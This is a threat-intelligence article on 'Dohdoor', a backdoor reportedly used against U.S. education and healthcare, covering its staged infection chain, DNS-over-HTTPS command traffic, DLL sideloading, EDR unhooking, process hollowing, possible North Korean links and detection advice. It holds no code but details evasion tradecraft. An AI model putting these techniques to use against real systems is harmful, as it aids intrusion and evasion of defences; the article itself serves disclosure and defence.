Dohdoor: The Stealthy New Backdoor Targeting U.S. Education and Healthcare

A suspected North Korean threat actor is deploying a stealthy new backdoor against U.S. education and healthcare organizations—hiding its command-and-control traffic inside encrypted DNS queries routed through Cloudflare, and using legitimate Windows executables to load its malware without triggering security tools.

On February 26, 2026, Cisco Talos published research revealing a previously undisclosed malware campaign that has been quietly targeting two of America's most vital and vulnerable sectors: education and healthcare. The threat actor, tracked as UAT-10027, has been deploying a sophisticated new backdoor dubbed "Dohdoor" since at least December 2025. The campaign combines several advanced evasion techniques designed to slip past modern security defenses—including DNS-over-HTTPS (DoH) for command-and-control communications, DLL sideloading through legitimate Windows executables, endpoint detection and response (EDR) bypass via syscall unhooking, and infrastructure concealed behind Cloudflare's globally trusted edge network.

The research was authored by Cisco Talos security researchers Alex Karkins and Chetan Raghuprasad, whose technical findings were published on the Cisco Talos Intelligence blog and shared with The Hacker News. The researchers confirmed that Dohdoor uses the DoH technique for C2 communications and is capable of downloading and executing additional payload binaries reflectively.

Cisco Talos has assessed with low confidence that UAT-10027 may have ties to North Korea, citing technical overlaps with tools and techniques used by the Lazarus Group, one of the world's most prolific state-sponsored hacking collectives. This article provides an in-depth analysis of the Dohdoor campaign, its technical mechanisms, the threat it poses to U.S. institutions, and its potential connections to North Korean cyber operations.

Why Education and Healthcare?

The deliberate targeting of education and healthcare is not random. These sectors manage enormous volumes of sensitive data—student records, research intellectual property, patient health information protected under HIPAA, and financial records—yet they consistently operate with tighter cybersecurity budgets and more legacy infrastructure than their counterparts in finance or defense. Schools, universities, hospitals, and clinics often run outdated systems, rely on a patchwork of vendors, and face staffing shortages in their IT and security teams.

As reported by GBHackers, UAT-10027's focus is on education and healthcare entities in the U.S., sectors that handle highly sensitive personal and medical data but often have limited security budgets and legacy systems. This makes them attractive targets for threat actors seeking persistent access, data exfiltration, or leverage for future ransomware operations.

The Multi-Stage Attack Chain

Dohdoor is not delivered in a single step. Instead, UAT-10027 employs a carefully orchestrated multi-stage attack chain designed to minimize detection at each phase. The exact initial access vector has not been confirmed by Cisco Talos, but the available evidence is consistent with social engineering phishing techniques that lead victims to execute a malicious PowerShell script.

Stage 1: PowerShell Downloader

According to Cisco Talos telemetry, the attack begins when a victim executes a PowerShell script—likely delivered through a phishing email, though the initial access vector has not been confirmed. This script uses curl.exe with an encoded URL to download a malicious Windows batch file from a remote staging server. The use of curl.exe, a legitimate Windows utility, helps the initial download blend in with normal system activity.

Stage 2: Batch Script Loader

The downloaded batch script performs several critical actions. First, it creates a hidden working directory under C:\ProgramData or C:\Users\Public. It then downloads a malicious DLL from the C2 server and renames it to mimic legitimate Windows system files such as propsys.dll or batmeter.dll. Next, the script copies trusted, signed Windows executables into the same directory—specifically Fondue.exe, mblctr.exe, and ScreenClippingHost.exe—and uses them to execute the malicious DLL through DLL sideloading.

DLL sideloading exploits the Windows DLL search order: when a legitimate executable looks for a DLL it depends on, it checks its own directory first. By placing a malicious DLL with the expected filename alongside the legitimate executable, the attacker ensures the malware loads automatically when the trusted program runs. Because the parent process is a signed Microsoft binary, security tools are far less likely to flag the activity as malicious.

Stage 3: Anti-Forensic Cleanup

After successfully loading the malware, the batch script performs anti-forensic cleanup to cover its tracks. As detailed by Cisco Talos, the script deletes the Run command history from the Windows RunMRU registry key, clears clipboard data, and then deletes itself entirely. This systematic evidence destruction makes incident response and forensic investigation significantly more difficult.

Inside Dohdoor: Technical Analysis

Once active, Dohdoor employs several sophisticated techniques that distinguish it from commodity malware and place it in the category of advanced persistent threat (APT) tooling.

Artifact Evidence and Timeline

Dohdoor is a 64-bit DLL compiled on November 25, 2025 — weeks before the campaign's observed start date of December 2025 — indicating the threat actor had significant development and testing time before deployment. The binary contains a debug path string of C:\Users\diablo\Desktop\SimpleDll\TlsClient.hpp, which provides a partial window into the attacker's development environment and may aid future attribution efforts.

DNS-over-HTTPS for Covert C2 Communication

Dohdoor's most distinctive feature is its use of DNS-over-HTTPS (DoH) to resolve its command-and-control infrastructure. Rather than making standard plaintext DNS queries that network security tools can easily monitor and block, the malware sends encrypted HTTPS requests to Cloudflare's DoH service on port 443. These requests use specific HTTP headers—including a User-Agent string of insomnia/11.3.0 and an Accept header of application/dns-json—to retrieve C2 server IP addresses embedded in JSON responses.

"The threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address." — Cisco Talos

This approach effectively bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that rely on monitoring suspicious domain lookups. After resolving the C2 IP address, Dohdoor establishes HTTPS tunnels using GET requests that mimic legitimate curl traffic, with User-Agent strings like curl/7.88 or curl/7.83.1.

EDR Bypass via Syscall Unhooking

Dohdoor implements an advanced EDR evasion technique by unhooking system calls in ntdll.dll. Endpoint detection and response products commonly monitor Windows API calls by placing hooks at the beginning of critical functions in the ntdll.dll library. These hooks redirect execution through the security product's monitoring code before allowing the original system call to proceed.

According to Cisco Talos, Dohdoor detects these hooks by reading the first bytes of targeted ntdll functions and comparing them against the expected syscall stub pattern. If hooks are detected, the malware patches in a direct syscall trampoline that bypasses the hooked function entirely, executing the system call without triggering the security product's monitoring code. The malware dynamically resolves Windows API functions by hash rather than using static imports, which further complicates static analysis and signature-based detection.

Custom Encryption and Process Hollowing

Dohdoor's payload is protected with a custom XOR-SUB decryption scheme that uses a 4:1 encrypted-to-decrypted size ratio and position-dependent logic. The implementation leverages SIMD (Single Instruction, Multiple Data) instructions for bulk processing, with a secondary loop handling remaining bytes. The decryption routine uses a constant of 0x26—a detail that becomes significant when examining potential links to North Korean tooling.

Once decrypted, the payload is injected into legitimate Windows processes through process hollowing. Dohdoor targets hardcoded system binaries including OpenWith.exe, wksprt.exe, ImagingDevices.exe, and wab.exe, executing its payload under the guise of these trusted processes to evade behavioral detection.

Deceptive Infrastructure

UAT-10027 has constructed its C2 infrastructure to resist simple string-based blocking. The campaign uses deceptive subdomains such as "MswInSofTUpDloAd" and "DEEPinSPeCTioNsyStEM" on mixed-case top-level domains like .OnLiNe, .DeSigN, and .SoFTWARe. These domains are designed to resemble legitimate software update or security inspection systems at a glance, frustrating defenders who rely on domain reputation or pattern matching for detection.

The Final Payload: Likely Cobalt Strike

While Cisco Talos was unable to capture a complete final payload, the evidence strongly suggests that Dohdoor serves as a loader for Cobalt Strike, one of the most widely used penetration testing frameworks—and one of the most commonly abused by threat actors for post-exploitation operations. TLS fingerprints from one of the C2 hosts, including a JA3S hash of 466556e923186364e82cbdb4cad8df2c and a specific certificate serial number, are consistent with default Cobalt Strike server profiles.

If Cobalt Strike beacons are indeed the final payload, the implications are severe. Cobalt Strike provides attackers with capabilities for lateral movement across compromised networks, credential harvesting, data exfiltration, and the deployment of additional malware or ransomware. For organizations in education and healthcare—which store vast repositories of personally identifiable information (PII), protected health information (PHI), and valuable research data—this represents a significant risk of large-scale data compromise.

The North Korean Connection

Cisco Talos has assessed with low confidence that UAT-10027 may have ties to North Korea's Lazarus Group. The assessment is based on several overlapping technical indicators, though the confidence level reflects meaningful differences in targeting that prevent a stronger attribution.

Technical Overlaps with Lazarus

The primary technical link is between Dohdoor and Lazarloader, a downloader tool previously identified by S2W Threat Intelligence Center as used by the Lazarus Group in campaigns targeting South Korea. S2W's analysis confirmed that Lazarloader uses XOR-SUB operations to recover embedded payloads, with execution arguments serving as decryption keys. Dohdoor's decryption routine mirrors this approach, including the use of the same 0x26 constant.

Additional overlaps include the NTDLL unhooking technique for EDR evasion, DLL sideloading methodology, the use of DNS-over-HTTPS via Cloudflare, and process hollowing for payload execution. The campaign's use of mixed-case top-level domains including .design, .software, and .online also aligns with operational preferences previously observed in Lazarus campaigns.

Divergence in Targeting

The reason for the low confidence assessment is that UAT-10027's focus on education and healthcare deviates from the Lazarus Group's well-documented preference for targeting cryptocurrency exchanges, financial institutions, and defense organizations. According to Palo Alto's Unit 42, the Lazarus Group operates under North Korea's Reconnaissance General Bureau (RGB) and has historically concentrated on financially motivated operations and intelligence collection targeting defense and technology sectors.

However, Cisco Talos pointed out that North Korean APT actors have previously targeted both healthcare and education. The 2022 CISA advisory documented the use of Maui ransomware against healthcare organizations, and Kimsuky—another North Korean APT cluster tracked separately from the Lazarus Group umbrella—has been observed targeting educational institutions. Notably, Andariel (also tracked as APT45 and Onyx Sleet), a cluster assessed to operate under the RGB and closely associated with Lazarus Group infrastructure, has conducted ransomware operations specifically against healthcare organizations, with those proceeds funding intelligence activities. This dual-mission precedent—persistent access combined with potential financial motivation—is relevant context for interpreting UAT-10027's healthcare targeting.

Understanding the Lazarus Group requires recognizing that it functions less as a single entity and more as an umbrella term for several related clusters operating under the RGB. Mandiant's 2022 research documented that at least three distinct groups—TEMP.Hermit, APT38, and Andariel—were assessed to operate under what was then called Lab 110, the primary organizational unit behind Lazarus Group activities. In a revised 2024 assessment, Mandiant updated this framing as North Korean cyber operations evolved post-pandemic, placing Lazarus Group clusters directly under the RGB rather than through the Lab 110 bureau designation, reflecting how shared infrastructure and overlapping operations had blurred prior distinctions. It is worth noting that Kimsuky, while also a North Korean state-sponsored group, is generally assessed to operate under a separate RGB bureau and is not a Lazarus Group sub-cluster—though all North Korean cyber activity ultimately falls under RGB direction. Regardless of the precise organizational lines, tooling and tradecraft can appear across campaigns with varying targeting profiles, which is part of what makes attribution in this case uncertain.

MITRE ATT&CK Techniques Observed

The Dohdoor campaign demonstrates a broad range of tactics and techniques mapped to the MITRE ATT&CK framework:

• Initial Access: Phishing (T1566) — suspected; initial access vector not confirmed
• Execution: PowerShell (T1059.001), command-line scripting via batch files (T1059.003)
• Persistence & Privilege Escalation: DLL sideloading (T1574.002)
• Defense Evasion: Process hollowing (T1055.012), dynamic API resolution and hash-based import obfuscation (T1027), custom XOR-SUB payload decryption (T1140), syscall unhooking to bypass user-mode EDR hooks, use of legitimate binaries / living-off-the-land (T1218)
• Command & Control: Encrypted channels via DNS-over-HTTPS (T1071.004) routed through Cloudflare's trusted infrastructure (T1090.002)
• Anti-Forensics: Indicator removal through registry and clipboard cleanup (T1070)

Defensive Recommendations

Organizations in the education and healthcare sectors should take immediate steps to assess their exposure to this threat. Cisco Talos has released specific detection signatures, including ClamAV signatures (Win.Loader.Dohdoor-10059347-0, Win.Loader.Dohdoor-10059535-0, Ps1.Loader.Dohdoor-10059533-0, and Ps1.Loader.Dohdoor-10059534-0) and Snort rules (SIDs 65949–65951 for Snort 2, and 301407 and 65949 for Snort 3). Indicators of compromise (IOCs) are available on the Cisco Talos GitHub repository.

Beyond signature-based detection, organizations should focus on behavioral monitoring. Key detection opportunities include:

• Monitor for suspicious PowerShell and batch script executions, particularly those that invoke curl.exe to download remote scripts
• Watch for anomalous DLL loading activity, especially when legitimate signed Windows executables load DLLs from unexpected directories like ProgramData or Public folders
• Implement DNS security controls capable of inspecting DoH traffic and flag non-browser applications making HTTPS connections to Cloudflare's DoH endpoints
• Query EDR telemetry for anomalous child processes spawned by legitimate signed executables loading DLLs from unexpected working directories
• Isolate hosts exhibiting unauthorized DLL sideloading behavior and capture memory dumps for forensic analysis
• Reimage confirmed compromised assets from known-good baselines

These recommendations align with NIST SP 800-61 Revision 3 and the NIST Cybersecurity Framework (CSF) 2.0.

The Bigger Picture

The Dohdoor campaign arrives at a time when cyber threats against U.S. critical infrastructure are intensifying. The education sector has faced an increasing wave of ransomware attacks in recent years, with school districts and universities losing access to critical systems and sensitive student data. Healthcare, meanwhile, remains one of the most targeted sectors globally. The combination of high data value, operational urgency, limited security resources, and the potential for life-threatening disruption makes these organizations particularly attractive to both financially motivated cybercriminals and state-sponsored actors.

"They're pretty ruthless, as we have seen in the past." — John Riggi, National Adviser for Cybersecurity and Risk, American Hospital Association (July 2022, on North Korean actors targeting healthcare)

Riggi's words, spoken in the context of Maui ransomware, apply with equal force here. The Dohdoor campaign does not appear to have resulted in data exfiltration as of the Cisco Talos publication date, but Dohdoor's design—persistent access, in-memory execution, and a likely Cobalt Strike payload—is built for long-term presence, not smash-and-grab operations. The absence of observed exfiltration is not the same as the absence of harm.

If the attribution to North Korea is accurate, the Dohdoor campaign represents a continued evolution in Pyongyang's cyber capabilities. North Korean threat clusters have demonstrated the ability to develop custom tooling, adapt their techniques to evade improving defenses, and operate across sectors beyond their traditional focus areas. The use of DNS-over-HTTPS for C2 communications, in particular, signals direct awareness of—and deliberate adaptation to—the network monitoring capabilities that defenders have deployed in recent years.

The Dohdoor campaign reinforces the case for layered security architectures, current threat intelligence subscriptions, and incident response capabilities calibrated to the increasingly sophisticated threats that education and healthcare organizations face. For sectors that have historically been treated as soft targets, the message from this campaign is clear: the sophistication gap between attacker and defender is not closing on its own.